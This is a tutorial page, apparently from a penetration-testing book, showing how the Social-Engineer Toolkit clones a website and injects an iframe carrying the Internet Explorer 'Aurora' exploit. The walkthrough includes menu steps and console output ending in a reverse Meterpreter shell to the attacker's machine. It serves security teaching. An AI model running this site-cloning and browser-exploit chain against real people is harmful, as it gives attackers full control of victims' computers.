The Social-Engineer Toolkit
147
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone:
http://www.secmaniac.com
Select
Website Attack Vectors
from the SET main menu, and then
select
The Metasploit Browser Exploit Method
. Then select the
Site Cloner
option, and enter
http://www.secmaniac.com
as the website you want to use
for cloning.
Once the site is cloned, we’ll set up the exploit to trigger when a target
browses the site.
Enter the browser exploit you would like to use
16. Microsoft Internet Explorer "Aurora"
Enter your choice (1-23) (enter for default):
16
What payload do you want to generate:
Name: Description:
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker.
Enter choice (example 1-10) (Enter for default):
Enter the port to use for the reverse (enter for default):
[*] Cloning the website: http://www.secmaniac.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 10.10.1.112:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http:// 10.10.1.112:8080/
[*] Server started.
To complete the attack setup, select the client-side exploit you wish to
use. Above, we choose the infamous Internet Explorer Aurora exploit and
accept the default reverse Meterpreter payload by pressing
ENTER
.
When the target reaches
http://www.secmaniac.com/
, the site looks normal,
but his system is compromised through an
iframe injection
. SET automatically
rewrites the site to contain the iframe that houses the Metasploit client-side
attack.
Back at the attacking machine, we see that the attack is successful. The
Meterpreter session has established the connection from the target to the
attacking machine, and we have full access to the system, as shown here.